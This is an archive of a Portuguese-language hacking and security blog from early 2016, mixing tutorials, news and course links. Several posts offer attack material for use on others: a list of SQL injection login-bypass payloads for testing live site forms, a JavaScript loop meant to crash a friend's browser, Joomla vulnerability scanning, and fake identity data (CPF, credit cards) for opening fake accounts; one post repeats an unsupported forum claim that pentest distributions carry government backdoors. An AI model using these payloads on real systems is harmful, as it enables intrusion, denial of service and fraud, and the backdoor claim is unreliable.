segunda-feira, 21 de março de 2016

Publicado segunda-feira, março 21, 2016 por com 0 comentário

Como Rastrear um IP

Nesse tutorial, iremos utilizar 2 ferramentas: o CMD ou terminal e o site ip-adress.

Para exemplificar usaremos o google.com.br como alvo.

Primeiramente abra o terminal ou cmd e digite o seguinte comando:
ping google.com.br

O IP da vítima irá aparecer desta maneira:


Depois disso, basta copiar esse IP, no nosso caso 216.58.202.99, e entrar no site ip-adress. Após entrar no site, digitamos o IP como mostrado na figura abaixo:


Ao clicar no botão "Track IP, host or website" irá aparecer o rastreamento com o Google Maps:


Podemos observar que ele dá informações sobre a cidade, estado, país, código postal e outros. A partir disso você pode levantar mais informações como o whois do IP, telefones, etc.
Ver mais
      edit

terça-feira, 8 de março de 2016

Publicado terça-feira, março 08, 2016 por com 0 comentário

Invadir computador através do mouse ou teclado sem fio

Pesquisadores de segurança da Bastille anunciaram a descoberta de uma vulnerabilidade em mouses sem fio que torna possível a instalação de rootkits em computadores. Para quem nunca ouviu falar, é uma empresa especialista em segurança.

As fabricantes de mouse como a Dell, HP, Lenovo, Microsoft, Gigabyte e outras, já anunciaram que vão lançar novos mouses e teclados usando corretamente a criptografia.



Os pesquisadores fizeram um site https://www.mousejack.com/ com mais informações sobre a falha. Também disponibilizaram no GitHub um kit de ferramentas em python que podem ser usados para descobrir dispositivos vulneráveis.

Para explorar a falha, a vítima deve está no máximo 100 metros de distância para poder interceptar os pacotes enviados entre o mouse e o computador, e assim substituir o sinal por outro, com pacotes infectados com um rootkit. Veja a demonstração abaixo:




Se deseja saber mais informações, leia a matéria original
TheHackerNews
Ver mais
      edit

sexta-feira, 4 de março de 2016

Publicado sexta-feira, março 04, 2016 por com 0 comentário

Descobrir vulnerabilidades em sites Joomla

Nesse tutorial vamos usar o joomscan, que é uma ferramenta feita em perl para verificar vulnerabilidades em sites Joomla. Ao fazer o scan, ele mostra qual a vulnerabilidade e qual o exploit deve ser usado para explorá-la.

Esse tutorial direcionado para usuários windows. Primeiramente, baixe o programa aqui Joomscan.pl

Lembrando que devemos ter instalado Perl para poder rodar o joomscan. Se quiser, pode entrar no site oficial https://www.perl.org/get.html

Depois disso só usar com o seguinte comando:

joomscan.pl -u <string> -x proxy:port

Muito usuários reclamam desse erro:
joomscan.pl check
Can't locate Switch.pm in @INC (you may need to install the Switch module) (@INC contains: C:/Perl/site/lib C:/Perl/lib .) at C:\Users\cliente\Desktop\Joomla\joomscan.pl line 22.
BEGIN failed--compilation aborted at C:\Users\cliente\Desktop\Joomla\joomscan.pl line 22.

Para resolver o problema, abrimos o CMD e executamos os seguintes comandos:

cpan

install local::lib


install App:cpanminus

exit

cpanm

cpanm install -f Switch

joomscan.pl -u <string> -x proxy:port


E depois disso, basta olha as vulnerabilidades


Outras opções são listadas abaixo:

joomscan.pl -u <string> -x proxy:port
        -u <string>      = joomla Url
        
        ==Optional==
        -x <string:int>  = proXy to tunnel
        -c <string>      = cookie (name=value;)
        -g "<string>"   = desired useraGent string within "
        -nv              = No Version fingerprinting check
        -nf              = No Firewall detection check
        -nvf/-nfv        = No version+firewall check
        -pe              = Poking version only
                           (and Exit the scanner)
        -ot              = Output to Text file (target-joexploit.txt)
        -oh              = Output to Html file (target-joexploit.htm)
        -vu              = Verbose (output every Url scan)
        -sp              = Show completed Percentage

Ver mais
      edit

quarta-feira, 24 de fevereiro de 2016

Publicado quarta-feira, fevereiro 24, 2016 por com 0 comentário

Bular sites que proibem seleção e botão direito

Abaixo vou disponibilizar o código, mas não utilize-o como opção segurança, pois não vai adiantar nada se a pessoa estiver mal intencionada.

<!-- Bloquear botão direito do mouse  -->
<script>
    var mensagem = "";
    function clickIE() {
        if (document.all) {
            (mensagem);
            return false;
        }
    }
    function clickNS(e) {
        if (document.layers || (document.getElementById && !document.all)) {
            if (e.which == 2 || e.which == 3) {
                (mensagem);
                return false;
            }
        }
    }
    if (document.layers) {
        document.captureEvents(Event.MOUSEDOWN);
        document.onmousedown = clickNS;
    }
    else {
        document.onmouseup = clickNS;
        document.oncontextmenu = clickIE;
    }

    document.oncontextmenu = new Function("return false")
</script>


<!-- Bloquear seleção de texto do site -->
<style>
.no-select {
    -webkit-touch-callout: none;
    -webkit-user-select: none;
    -khtml-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    -o-user-select: none;
    user-select: none;
}
</style>

<body class="no-select">
</body>

Vou apresentar dois meio de burlar isso.

Alternativa 1
Apenas cole a URL do site na frente para traduzir e você vai poder selecionar o que quiser:
http://translate.google.com.br/translate?hl=pt-BR&sl=iw&tl=pt&u=

Alternativa 2
Todo navegador permite você salvar a página apertando (ctrl+s). Depois de salvar, basta executar o pagina.html ou pagina.htm no seu computador, ou apenas copiar um texto, ou ainda uma imagem.


Ver mais
      edit

segunda-feira, 22 de fevereiro de 2016

Publicado segunda-feira, fevereiro 22, 2016 por com 0 comentário

Descobrir as senhas de Wi-Fi salvas no seu celular (acesso root)

Primeiramente não é possível visualizar as senhas sem ter acesso root no seu celular, pois os arquivos que as senhas estão gravadas são criptografados.

Se quiser ter acesso root no seu celular, siga esse simples tutorial aqui.

Primeiramente baixe o aplicativo na PlayStore Wifi Passwords.



Depois de baixado, execute o aplicativo e dê permissão ao Super User:



Depois de permitir o acesso root, o WiFi Passwords vai listar todas as redes Wifi já conectadas no seu Android:


A partir de agora você tem acesso a todas as senhas armazenadas no seu smartphone.
Ver mais
      edit

sábado, 20 de fevereiro de 2016

Publicado sábado, fevereiro 20, 2016 por com 1 comentário

Como fazer root no seu Android

Nesse tutorial vamos usar um programa chamado KingRoot, que faz root na maiorias dos smartphones. Alguns usuários não conseguem êxito, mas a maioria consegue.

Atualmente o aplicativo se encontra na versão 4.8, e com ele é possível fazer root até na versão 6.0 do Android (Marshmallow)

Se preferir poderá baixar também no site do seu fabricante, mas não está disponível no Google Play, ou seja, trata-se de um aplicativo não verificado. Então será necessário habilitar no seu Android a permissão para executar aplicativos desconhecidos. Geralmente tem a "Opções de desenvolvedor", que aparece logo após você clicar seguidas vezes na versão do Android.

Depois de baixado, no seu Android você terá o seguinte o ícone:

Após instalar, clique no KingRoot, e vai abrir a tela principal. Nessa tela, basta apenas clicar na ícone do Android em laranja e seu acesso root estará concluído.



Se quiser desinstalar um aplicativo padrão do seu smartphone, basta apenas clicar em "Uninstall tool", o ícone da lixeira.




Ver mais
      edit

quinta-feira, 11 de fevereiro de 2016

Publicado quinta-feira, fevereiro 11, 2016 por com 0 comentário

Vídeo Aula sobre TCP IP

O TCP/IP é um pilha de protocolos de comunicação entre computadores em rede. A sigla TCP significa Protocolo de Controle de Transmissão e o IP - Protocolo de Internet.
Abaixo está duas vídeo aulas explicando um pouco sobre protocolo TCP/IP.




PARTE 1        PARTE 2
Ver mais
      edit

segunda-feira, 8 de fevereiro de 2016

Publicado segunda-feira, fevereiro 08, 2016 por com 4 comentários

Apostila completa CMD (Prompt de Comando)

Para quem deseja estudar mais sobre o Prompt de Comando (CMD) e saber como utilizar alguns comandos, estou disponibilizando uma apostila muito bacana que eu fiz há um tempo atrás, que pode ser baixada aqui.

Esse conjunto de comandos e outras sintaxes é chamada de programação Batch ou BAT. Segundo o Wikipédia, Batch é um arquivo utilizado por técnicos e programadores para otimizar tarefas, ou seja, é um script que é executado sequencialmente pelo CMD.

Caso tenha interesse em saber mais como funciona a programação, pode baixar outra apostila, que não é de minha autoria, nesse link.



Ver mais
      edit

sexta-feira, 5 de fevereiro de 2016

Publicado sexta-feira, fevereiro 05, 2016 por com 0 comentário

Programas úteis no windows

No Windows há vários programas excelentes para serem usados no dia-a-dia



São elas:

1 Área de Transferência = clipbrd.exe (Mostra o que está na memória temporária
2 DirectX diagnóstico = dxdiag.exe (testar sua placa de video e placas de som)
3 Diretivas de grupo = gpedit.msc (permite alterar objetos de diretiva de grupo)
4 Driver Verifier Manager = verifier.exe (monitoramento das atividades dos drivers).
5 Dr Watson = drwtsn32.exe (Solução de problemas)
6 File signature verification tool = sigverif.exe (analisa a assinatura de um arquivo)
7 Gerenciador de Objetos = packager.exe 
8 Gerenciador de Programas = progman.exe
9 Informações sobre o sistema = msinfo32.exe (exibe todas as informações do computador)
10 Limpeza de Disco = cleanmgr.exe (funciona como o CCleaner)
11 Mapa de Caracteres = charmap.exe (mostra todos os caracteres para todas as fontes)
12 Mcft Synchronization Manager = mobsync.exe (sincronização de arquivos na rede local)
13 Network shared folder wizard = shrpubw.exe (criar pastas compartilhadas na rede)
14 ODBC Data Source Administrator = odbcad32.exe (gerenciamento de banco de dados)
15 Private character editor = eudcedit.exe (criar ou modificar caracteres)
16 Remote Access phone book = rasphone.exe 
17 Registry Editor = regedit.exe (gerenciar o Registro do Windows)
18 Services = services.msc (gerenciamento de todos os serviços)
19 System Configuration Editor = sysedit.exe (modificar system.ini e win.ini)
20 System configuration = msconfig.exe (controlar os arquivos que iniciam no sistema)
21 System Monitor = perfmon.exe (analisa a performance do computador)
22 Syskey = syskey.exe (proteger suas senhas).
23 Volume Control = sndvol32.exe (controlar o volume)

Ver mais
      edit

quinta-feira, 4 de fevereiro de 2016

Publicado quinta-feira, fevereiro 04, 2016 por com 0 comentário

Tutorial gpedit.msc

Essa incrível ferramenta é a diretiva de grupo do windows, e com ele você pode restringir acessos à vários menus, programas e outros. Pode bloquear jogos, registro do windows (regedit), gerenciador de tarefas e outros.



Com ele você pode fazer inúmeras coisas. Abaixo está um link que ensina manuseá-lo no XP, mas vale tanto para o Windows 7, 8, 8.1 e 10

Gpedit
Ver mais
      edit

segunda-feira, 1 de fevereiro de 2016

Publicado segunda-feira, fevereiro 01, 2016 por com 0 comentário

Trollar um amigo travando seu computador ou celular

Ao entrar no site abaixo ele trava seu PC, Iphone e/ou smartphone.




Testei em uma máquina de testes aqui em casa, e consumiu os 6 GB de memória, e elevou o processamento em 100%.

Analisando melhor, seu funcionamento é bem simples;
Esse simples código em JavaScript que é o causador do travamento;
Como podemos ver, a cada interação, ele grava um novo histórico no seu navegador, fazendo-o travar instantaneamente.

O cara ainda foi humilde, nem quis colocar um valor muito alto, ou mesmo usar alguma thread com php.


<script>
          var total = "";
          for( var i = 0; i < 100000; i++ ) {
               total = total + i.toString();
               history.pushState(0,0, total );
          }
</script>
Ver mais
      edit

sexta-feira, 29 de janeiro de 2016

Publicado sexta-feira, janeiro 29, 2016 por com 0 comentário

Sistemas Pentest (Kali, BackBox, BackTrack) com backdoors

Primeiramente, esse post não foi escrito por minha pessoa. Porém achei muito interessante compartilhar essa informação. Os créditos vão para o usuário “General anonymous” do forum.guiadohacker.com.br

Se você usar as distribuições de pentest, principalmente a backbox, vocês não estarão anonymous, provavelmente tem algum tipo backdoor colocado pela NSA ou CIA, ou os próprios desenvolvedores, a fim de monitorar os usuários.




Experiência com backbox! 


Na backbox (eu sou um grayhat e ataco só governos criminosos, nunca inocentes), durante meu procedimento de ataque, por desconfiança, eu decidi fazer uma análise forense (sou especialista) e análise de tráfego de rede e foi consegui identificar backdoors. 

O metasploit da backbox funciona para fazer pentest, porém ela está com scrips que fazem conexão reserva para um outro lugar (provavelmente um hacker, NSA ou CIA). Enfim, na análise forense que eu fiz foi identificado modificações de arquivos, desaparecimento de arquivos, adição de arquivos, etc. 

Bom, pela análise que fiz, PRATICAMENTE QUALQUER distribuição de pentest, tem uma probabilidade de 100% dos desenvolvedores estarem ownando os usuários e monitorando 

Alguns black hats que me comuniquei também me informaram que durante um ataque black hat, o sistema parava de funcionar sem nenhum sentido. É como se houve realmente uma backdoor bem escondida e algum agente governamental provavelmente dos EUA monitorando e controlando conforme seus objetivos.

Eu recomendo não usar backtrack, backbox, kali linux para absolutamente nada particular, usem eles somente para pentest white hat. O que podemos fazer para garantir nossa privacidade é absolutamente usar as distribuições pentest para aprender e depois em um linux limpo (Debian ou CentOs), instalamos todas as ferramentas e o usamos com privacidade assim garantimos que não há backdoor... 

Ainda recomendo fortemene usar o tails, o sistema operacional que o Snowden inclusive usa, a fonte do tails é confiável.

Ver mais
      edit

quarta-feira, 27 de janeiro de 2016

Publicado quarta-feira, janeiro 27, 2016 por com 0 comentário

Curso HTML5 e CSS3

Para quem está começando na área de programação web, é sempre bom fazer um curso para aperfeiçoar suas técnicas e criar sites ou sistemas mais bonitos e limpo. Ao fazer os cursos abaixo, você será capaz de:

Entender o que é HTML5 e o CSS3
Entender a estrutura básica de um arquivo HTML5
Usar cada uma das diferentes tags do HTML5
Utilizar o navegador para inspecionar elementos e encontrar bugs
Definir estilos para elementos usando o CSS3
Desenvolver páginas Web Completas

Para quem deseja aprender HTML, há um curso grátis no site Fundação Bradesco: HTML

Já quem deseja se aprofundar mais e estudar HTML5 e CSS3, o site w3c, disponibiliza duas apostilas: HTML5 e CSS3

Além disso, é recomendado também aprender muito sobre JavaScript, pois com essa linguagem que muitos efeitos e interações são criadas na web. Para isso, eu recomendo um curso da Udemy, onde você aprenderá todo o conteúdo de CSS, HTML e JavaScript



Ver mais
      edit

quarta-feira, 20 de janeiro de 2016

Publicado quarta-feira, janeiro 20, 2016 por com 0 comentário

Dorks para testar injeção SQL em formulários PHP

Ainda há vários sites na internet com essa falha, e há várias maneiras de explorá-la. E uma dessas maneiras é testar em formulários onde há campos de login e senha. Abaixo está uma lista que usava para a fim de testar se o formulário contém a falha SQL.



b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' or 0=0 --
"or 0=0 --
' or 0=0 #
"or 0=0 #
' or ' x'='x
"or" x"="x
') or (' x'='x
' or 1=1 --
"or 1=1 --
' or a=a --
"or" a"="a
') or (' a'='a
") or ("a"="a
hi "or" a"="a
hi "or 1=1 --
hi ' or 1=1 --
hi ' or ' a'='a
hi ') or (' a'='a
hi") or ("a"="a
hi ‘ or 1=1 –
hi ‘ or ‘ a’='a
hi ‘) or (‘ a’='a
hi”) or (“a”=”a
admin ‘ – -
‘ or 0=0 –
“or 0=0 –
‘ or ‘ 1
b’ or ‘ 1=’
‘ or ’1
‘ or ‘|
‘ or ‘a’='a
‘ or ”=’
‘ or 1=1–
‘) or (‘a’='a
‘ or ’1'=’1
‘ or 0=0 #
“or 0=0 #
‘ or ‘ x’='x
“or” x”=”x
‘) or (‘ x’='x
“or” a”=”a
“) or (“a”=”a
hi “or” a”=”a
hi “or 1=1 –
‘ or a=a –
' or ' 1
' or '1'='1
' or 1=1--
'or''='
' or 'a'='a
') or ('a'='a
Ver mais
      edit

terça-feira, 19 de janeiro de 2016

Publicado terça-feira, janeiro 19, 2016 por com 0 comentário

Gerador de Pessoas



O nome do tópico pode parecer estranho, mas é exatamente que esse site: LINK.
Através dele você pode gerar dados de:

Certidões
CNH
CPF
CNPJ
RG
Título de Eleitor
Pessoas
Imagem
Senha
Conta Bancária
PIS/PASEP
CEP
Inscrição Estadual
Cartão de Crédito
Empresas
Lorem Ipsum

Através de todas essas informações você pode abrir inúmeras contas fakes na internet. Isso servirá de base para o próximo tutorial, onde vamos conseguir usar a netflix por 30 dias grátis.

OBS.: Todos os dados gerados são fictícios.


Ver mais
      edit

quinta-feira, 14 de janeiro de 2016

Publicado quinta-feira, janeiro 14, 2016 por com 0 comentário

Maiores Ataques Hackers de 2015



Com quase 300 milhões de registros vazados e US$ 1 bilhão roubados em 2015, as chances são de que você ou alguém que você conhece foi afetado por um ataque cibernético neste ano. Todos os meses de 2015 trouxe um novo grande ataque cibernético.

Hackers atingiram empresas e governos, mês após mês, muitas vezes com resultados chocantes. Se fosse listar todos os ataques a lista ficaria espantosamente grande. Assim foram separados apenas os piores, levando em conta o grande número de pessoas afetadas ou, no caso de funcionários do governo específicos serem cortados, e as implicações incalculáveis e precipitação após esse fato.

9 - Hackers violaram os sistemas de saúde da seguradora Anthem Inc., expondo cerca de 80 milhões de registros pessoais.

Em fevereiro, a Anthem reconheceu que foi invadida por atacantes ainda desconhecidos, onde acessaram 80 milhões de dados de pessoas que utilizam planos de saúde como Amerigroup e Anthem Blue Cross e Blue Shield.

Até o CEO da companhia foi afetada pela violação de dados, que expôs aniversários, endereços, números de segurança social (CPF aqui no Brasil), e e-mails. A empresa disse que não havia "nenhuma evidência" de que os cartões de crédito ou informações médicas tenham sido expostas.

A grande falha pode ter sido obra de hackers chineses, uma vez que foram deixadas "impressões digitais" de um Estado-nação, de acordo com a Bloomberg.

8 - Talvez o ataque de mais alto perfil foi em Ashley Madison, o site do adultério que prometia seus membros assuntos sigilosos.

Um grupo chamado Impact Team roubou o banco de dados do site em julho e tentou chantagear sua controladora Avid Life Media para derrubar o site. Após 30 dias, o site ainda permaneceu em linha, e os hackers liberaram tudo, o que incluiu informações pessoais, como e-mails e endereços físicos de 37 milhões de usuários.

O grupo seguiu com o ataque e vazaram uma quantidade ainda maior de e-mails corporativos de Avid Life, incluindo as do CEO Noel Biderman, que se demitiu pouco tempo depois.

Apesar de estar entre os dados vazados, não significa, necessariamente, que uma pessoa foi realmente um dos usuários do site - não houve verificação e-mail, pois até mesmo o Barack Obama e vários outros políticos estavam lá.

Alguns, como o Pastor John Gibson que, cometeu suicídio apenas seis dias depois de ter sido encontrado no banco de dados.

Apesar dos vazamentos, a empresa afirma que aumentou em vários milhões de membros, embora ainda enfrenta uma série de ações judiciais coletivas de clientes cujas identidades foram expostas.

7 - Um grupo de hackers desconhecidos, infiltraram-se em centenas de bancos em vários países, roubando cerca de 1 bilhão de dólares


O maior assalto a banco de 2015 foi completamente digital. A partir do final de 2013, um grupo desconhecido de criminosos cibernéticos se infiltram em várias empresas financeiras, e depois infectaram seus alvos com anexos de e-mail infectados (phishing).

No momento em que o ataque foi descoberto pela Kaspersky Lab em 2015, pelo menos 100 bancos em 30 países, incluindo a Rússia, os EUA, Alemanha, China e Ucrânia, foram afetados. Em muitos casos, os criminosos usaram suas façanhas para retirar o dinheiro de caixas eletrônicos ou transferir o dinheiro para contas controladas por eles.

6 - O grupo de segurança cibernética Hacking Team foi hackeado, revelando que ele estava fornecendo ferramentas de espionagem para governos.

O grupo Hacking Team, anunciou em julho, a todos os seus clientes para não usarem seu software depois que um hacker violou os seus sistemas e conta no Twitter, além de vazar 400 gigabytes de dados.

A empresa diz que fornece soluções para fins de aplicação da lei e de inteligência, e negou relatos de que foi vendida a tecnologia para qualquer país.

5 - Hackers ganharam acesso a sistemas da Casa Branca em 2014, mas a natureza da invasão tem pior maneira como novos detalhes surgiram no ano de 2015.

Uma violação da rede na Casa Branca em outubro 2014 causou "interrupção temporária de alguns serviços", mas foi minimizado na época.

Meses mais tarde, foi revelado que a invasão partiu de hackers russos, onde acessaram agenda e e-mails que revelaram informações pessoais, movimentos e debates políticos, entre outras comunicações ainda mais sensíveis do presidente.

"Este tem sido um dos ataques mais sofisticados que já vimos", disse um alto funcionário americano ao The New York Times.

Esses mesmos agressores são também responsáveis por invadirem os sistemas de e-mail do Departamento de Estado, segundo a CNN.

4 - Cerca de 15 milhões de clientes da T-Mobile, teve suas informações roubadas depois que a empresa de verificação de crédito Experian, foi invadida.

Cerca de 15 milhões de pessoas que se cadastraram nos últimos três anos para os serviços sem fio a partir de T-Mobile, encontraram-se em um situação complicada, já que houve uma violação de dados.

Os Hackers entraram no banco de dados da Experian, a agência de informações de crédito que verifica sobre potenciais clientes T-Mobile. Os hackers vazaram nomes, endereços, datas de nascimento e números de segurança social.

Ele também destacou os perigos de uma empresa depender de outro para manter os dados dos clientes. "Obviamente, eu estou muito irritado com esta violação de dados e nós vamos instituir uma revisão profunda da nossa relação com a Experian," disse o CEO T-Mobile John Legere, em uma carta aberta.

3 - Diretor da CIA John Brennan, teve o seu e-mail hackeado e possuia documentos pessoais sensíveis.

Um hacker que diz ser um estudante de escola secundária americana disse que através "engenharia social" conseguiu acesso conta de e-mail AOL do diretor da CIA, que tinha anexos sensíveis dentro.

O hacker postou supostas lista de contatos e registros de chamadas de John Brennan. Mas o maior vazamento foi o questionário de segurança SF-86 para seu certificado de segurança, que tinhas vários números de Brennan e outros de segurança social (CPF), nomes, endereços, e outras informações sensíveis.


O hacker disse ao Wired como ele ganhou acesso através de uma série de truques inteligentes, primeiro se passando como um empregado Verizon para obter informações sobre Brennan, que ele então tinha utilizado para desbloquear o e-mail e por mentir ao serviço AOL, se passando como cliente.

2 - Uma violação de dados na fabricante de brinquedos de crianças VTech resultou na liberação de registros em 4,8 milhões de pais e mais de 6,8 milhões de crianças.

Os dados pessoais de milhões de pais e crianças foram expostos depois que um hacker obteve acesso ao servidor da fabricante de brinquedos VTech, em novembro.

O hacker disse ao Motherboard que não tinha planos de vazar os dados, embora a violação de informações pessoais, como nomes, endereços, datas de nascimento, e-mails e poderia facilmente ser vendido na web escuro.

A violação também incluiu milhares de arquivos de imagem, tiradas com produtos VTech e enviados online. A empresa disse que cartões de crédito ou números de segurança social não foram obtidos com a invasão.

1 - A agência do governo norte-americano responsável pela verificação de antecedentes foi invadida, e informações sobre praticamente todos os funcionários federais desde o ano de 2000 foram vazadas.

Em junho, soube-se que hackers obtiveram acesso aos bancos de dados do Gabinete de Gestão Pessoal e roubou dados de cerca de 4,2 milhões de funcionários federais. Porém, depois de um rastreio de segurança federal a quantidade aumentou para mais de 22 milhões.

Alguns acreditam que a invasão foi trabalho do governo chinês, e permitiu o acesso aos sensíveis questionários SF-86, dados militares, oficiais de inteligência, e outros.

Eles divulgaram os nomes, endereços, informações de saúde, história financeira, números de segurança social, membros da família, e até mesmo as opiniões de seus vizinhos. Além disso, foram expostas mais de 1 milhão de impressões digitais. Especialistas acreditam que a partir da biometria ainda mais dados poderiam ser roubados.

OPM Diretor Katherine Archuleta renunciou em meio a críticas bipartidária, apenas um mês após a invasão ter se tornada pública.


Ver mais
      edit

segunda-feira, 11 de janeiro de 2016

Publicado segunda-feira, janeiro 11, 2016 por com 6 comentários

Apostila PenTest em Português - Parte 1

Apostila com conteúdo profissional que aborda várias técnicas de invasão, partindo desde os conceitos mais simples aos mais avançados.

Para quem não sabe, PenTest é o acrônimo para PENETRATION TEST ou Teste de Penetração, onde um sistema passa por uma rigorosa varredura a fim de encontrar vulnerabilidades, utilizando todo tipo de ferramentas e técnicas possíveis para invadir o sistema. Possibilitando a correção de falhas antes que sejam exploradas por uma pessoa mal-intencionada.



Segue abaixo os conteúdos abordados pela apostila:

Introdução a segurança da informação.
Introdução ao teste de invasão e ética hacker.
Tipos de PenTest.
Desenvolvimento de relatórios.
Google hacking.
Footprint.
Fingerprint.
Engenharia social.
Varreduras ativas, passivas e furtivas.
Enumeração do alvo.
Dos, DDos, sequestro de sessão.
Netcat, backdoors, rootkits, keyloggers e worms.
Detectando Honeypots .
Evasão de firewall/IDS com Nmap.
Brute Force, John The Ripper, THC-Hydra, BruteSSH2.
Vulnerabilidades em aplicações web.
Escalação de privilégios.
Técnicas de Sniffing.
Usando exploits com Metasploit.
Usando Ettercap, Wireshark, Maltego.
Invasão de redes sem fio (Wireless)
Botnet’s (entendendo a manipulação de computadores zumbis).


Download 4shared: Link
Senha: "http://secdigital.blogspot.com.br/", sem aspas

Atualização: Nova Apostila PenTest em Português - Parte 2









  • Introdução a segurança da informação.
  • Introdução ao teste de invasão e ética hacker.
  • Tipos de PenTest.
  • Desenvolvimento de relatórios.
  • Google hacking.
  • Footprint.
  • Fingerprint.
  • Engenharia social.
  • Varreduras ativas, passivas e furtivas.
  • enumeração do alvo.
  • Dos, DDos, sequestro de sessão.
  • Netcat, backdoors, rootkits, keyloggers e worms.
  • Detectando Honeypots .
  • evasão de firewall/IDS com Nmap.
  • Brute Force, John The Ripper, THC-Hydra, BruteSSH2.
  • Vulnerabilidades em aplicações web.
  • Escalação de privilégios.
  • Técnicas de Sniffing.
  • Usando exploits com Metasploit.
  • Usando Ettercap, Wireshark, Maltego.
  • invasão de redes sem fio (Wireless)
  • Botnet’s (entendendo a manipulação de computadores zumbis).
  • - See more at: http://www.linuxforce.com.br/curso-pentest-profissional-seguranca-hacker/#sthash.IwhqzrVn.dpuf
    Ver mais
          edit

    sexta-feira, 8 de janeiro de 2016

    Publicado sexta-feira, janeiro 08, 2016 por com 0 comentário

    Prevenção do SQL Injection com mysql_real_escape_string()

    Esse problema é bem conhecido, mas temos várias formas de se proteger. Uma delas é através da função especial mysql_real_escape_string() que o PHP possui.



    A função mysql_real_escape_string() pega uma string que vai ser usada em uma consulta MySQL e retorna a mesma sequência com todas as tentativas de injeção SQL. Basicamente, ela irá substituir aquelas aspas problemáticas (') por uma barra invertida (\).

    IMPORTANTE:

    Caso esteja usando o mysqli:
                  Estilo Orientado à Objetos:
                      string mysqli::escape_string ( string $escapestr )
                      string mysqli::real_escape_string ( string $escapestr )

                  Estilo procedural:
                      string mysqli_real_escape_string ( mysqli $link , string $escapestr )

                  Fonte: Manual PHP

    Caso esteja usando o mysql:
                 string mysql_real_escape_string ( string $unescaped_string [, resource $link_identifier ] )

                  Fonte: Manual PHP

    Vamos mostrar como essa função funciona em um ataque de SQL Injection.

    Código PHP:
     $link = mysql_connect("localhost", "usuario", "senha", "sua_base");  
     if (!$link) {  
       echo "Error: Falha ao conectar-se com o banco de dados MySQL." . PHP_EOL;  
       exit;  
     }
     echo "Sucesso: Sucesso ao conectar-se com a base de dados MySQL." . PHP_EOL."<br>";  
    
     //Observação: você deve está conectado no banco de dados para usar essa função.  
     $string_maliciosa = "' OR 1'";   
     $string_maliciosa = mysql_real_escape_string($string_maliciosa);  
     $query_maliciosa = "SELECT * FROM clientes WHERE username = '$string_maliciosa'";  
     echo "SQL Injection: <br />" . $query_maliciosa . "<br />";  
     $ataque_deletar = "'; DELETE FROM clientes WHERE 1 or username = '";   
     $ataque_deletar = mysql_real_escape_string($ataque_deletar);  
     $query_deletar = "SELECT * FROM clientes WHERE username = '$ataque_deletar'";  
     echo "Ataque Injection: <br />" . $query_deletar;  
    


    Resultado:

    Resultado do primeiro ataque:
     SELECT * FROM clientes WHERE username = '\' OR 1\''   
    

    Resultado do segundo ataque:
     SELECT * FROM clientes WHERE username = '\'; DELETE FROM clientes WHERE 1 or username = \''   

    Observe que essas aspas foram precedidas por uma barra invertida \, impedindo o ataque de injeção. Agora todas essas consultas que o atacante irá fazer, apenas vai encontrar um nome de usuário que é apenas completamente ridículo:

    Ataque 1: \’ OR 1\’
    Ataque 2: \’; DELETE FROM clientes WHERE 1 or username = \’


    Agora não tem desculpa para não se proteger, pois é uma função eficiente e irá ajudar a evitar ataques de injeção de SQL em seus sites.
    Ver mais
          edit

    sexta-feira, 1 de janeiro de 2016

    Publicado sexta-feira, janeiro 01, 2016 por com 0 comentário

    Algoritmo da equação de 3º grau

    Para facilitar minha vida fiz um algoritmo baseado nas fórmulas de Cardano e Tartaglia para calcular equações de 3º Grau. Estou disponibilizando o código em duas linguagens C e JavaScript.



    Código em C:

     #include<stdio.h>   
     #include<stdlib.h>   
     #include<math.h>   
     void eq_3grau()   
     {   
        system("cls");   
        float a,b,c,d;   
        float r,q,s,discrim,dum1 ,term1, r13, t;   
        float x1,x2,x3;   
        float x11=0, x22=0,x33=0;    
        do{   
        printf("Digite o valor de a: "); scanf("%f",&a);   
        if(a==0)   
          printf("O coeficiente do cubo não pode ser 0.\n\n");   
        }while(a==0);   
        printf("Digite o valor de b: "); scanf("%f",&b);   
        printf("Digite o valor de c: "); scanf("%f",&c);   
        do{   
        printf("Digite o valor de d: "); scanf("%f",&d);   
        if(d==0)   
         printf("\n\nBem, uma raiz eh 0. Divida a equacao polinomial por x e você tem uma equacao do segundo grau. Aqui nada mais ha a ser feito.\n\n");   
       }while(d==0);   
        b /= a;    
        c /= a;    
        d /= a;    
        q = (3*c - (b*b))/9;   
        r = -(27*d) + b*(9*c - 2*(b*b));   
        r /= 54;   
        discrim = q*q*q + r*r;   
        printf("\n\ndiscri = %.20f\n\n", discrim);   
        x1 = 0; //A primeira raiz é sempre real.   
        term1 = (b/3.0);     
        if (discrim > 0) // uma real, duas imaginarias   
        {    
         printf("\n\nO discriminante eh maior que zero");   
         s = r + sqrt(discrim);   
         s = (s < 0) ? -cbrt(-s) : cbrt(s);   
         t = r - sqrt(discrim);   
         t = (t < 0) ? -cbrt(-t) : cbrt(t);   
         x1= -term1 + s + t;   
         term1 += (s + t)/2.0;   
         x33 = x22 = -term1; //parte real   
         term1 = sqrt(3.0)*(-t + s)/2;   
         x2 = term1;   
         x3 = -term1;   
       printf("\n\nx1 = %.8f\n", x1);   
       printf("x2 = %.8f + %.8f*i\n", x22,x2);   
       printf("x3 = %.8f + %.8f*i\n", x33, x3);   
       }   
       if (discrim == 0) // Todas as raizes sao reais.   
       {   
         printf("\n\nO discriminante eh igual a zero");   
         r13 = (r < 0) ? -cbrt(-r) : cbrt(r);   
         x1 = -term1 + 2.0*r13;   
         x3 = x2 = -(r13 + term1);   
       printf("\n\nx1 = %.8f\n", x1);   
       printf("x2 = %.8f\n", x2);   
       printf("x3 = %.8f\n", x3);   
       }   
       if(discrim < 0) //Opcao deixada para onde todas as raizes sao reais e distintas (q < 0)   
       {   
         printf("\n\nO discriminante eh menor que zero");   
       q = -q;   
       dum1 = q*q*q;   
       dum1 = acos(r/sqrt(dum1));   
       r13 = 2.0*sqrt(q);   
       x1 = -term1 + r13*cos(dum1/3.0);   
       x2 = -term1 + r13*cos((dum1 + 2.0*M_PI)/3.0);   
       x3 = -term1 + r13*cos((dum1 + 4.0*M_PI)/3.0);   
       printf("\n\nx1 = %.8f\n", x1);   
       printf("x2 = %.8f\n", x2);   
       printf("x3 = %.8f\n", x3);   
       }     
     }   
     int main ()   
     {   
     do{   
       system("cls");   
     eq_3grau();   
      printf("\n\n\nQuer continuar? (s/n) ");   
     }while (toupper(getch()) != 'N');   
        // by Bruh   
     }   
    



    Código em JavaScript

     <!--Define JavaScript functions.-->   
     function Resolve(dataForm){   
